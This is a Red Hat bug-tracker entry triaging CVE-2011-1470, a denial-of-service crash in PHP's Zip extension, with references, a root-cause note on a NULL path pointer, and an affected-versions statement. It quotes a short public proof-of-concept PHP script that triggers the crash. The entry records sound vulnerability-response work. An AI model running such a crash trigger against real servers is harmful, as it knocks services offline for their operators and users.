Bug 690911 (CVE-2011-1470)

Summary: CVE-2011-1470 php: crash when processing certain Zip archives
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: bressers, dkutalek, fedora, jorton, rpm
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2011-10-12 11:42:06 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 715030    

Description Jan Lieskovsky 2011-03-25 18:54:57 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-1470 to
the following vulnerability:

The Zip extension in PHP before 5.3.6 allows context-dependent
attackers to cause a denial of service (application crash) via a
ziparchive stream that is not properly handled by the
stream_get_contents function.

References:
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1470
[2] http://bugs.php.net/bug.php?id=53579
[3] http://www.php.net/ChangeLog-5.php

Upstream patch:
[4] http://svn.php.net/viewvc/?view=revision&amp;revision=306493

Comment 1 Jan Lieskovsky 2011-03-25 18:56:35 UTC
Public PoC from [2]:
====================
<?php

$target_file = 'META-INF/MANIFEST.MF';

$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE)
{
    return FALSE;
}

if ($za->statName($target_file) !== FALSE)
{
    $fd = $za->getStream($target_file);
}
else
{
    $fd = FALSE;
}
$za->close();

if (is_resource($fd))
{
    echo strlen(stream_get_contents($fd));
}

?>

Comment 8 Huzaifa S. Sidhpurwala 2011-10-12 11:30:18 UTC
Details from Joseph Orton:
=========================


The fix for this one:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/zip_stream.c?r1=306493&r2=306492&pathrev=306493

ensures stream->orig_path is non-NULL in the zip stream object.

This matters because php_zip_ops_stat assumes ->orig_path is non-NULL:

static int php_zip_ops_stat(php_stream *stream, php_stream_statbuf *ssb TSRMLS_DC) /* {{{ */
{
 	struct zip_stat sb;
 	const char *path = stream->orig_path;
	int path_len = strlen(stream->orig_path);

But php_zip_ops_stat() was only added in PHP 5.3.4; the function does 
not exist in 5.3.3, nor does anything else in ext/zip which assumes 
stream->orig_path is non-NULL.

Conclusion: CVE-2011-1470 only affects PHP 5.3.4 and 5.3.5.

Comment 9 Huzaifa S. Sidhpurwala 2011-10-12 11:37:50 UTC
Statement:

This issue does not affect the version of php shipped with Red Hat Enterprise
Linux 4, 5 and 6. This issue does not affect the version of php53 shipped with
Red Hat Enterprise Linux 5.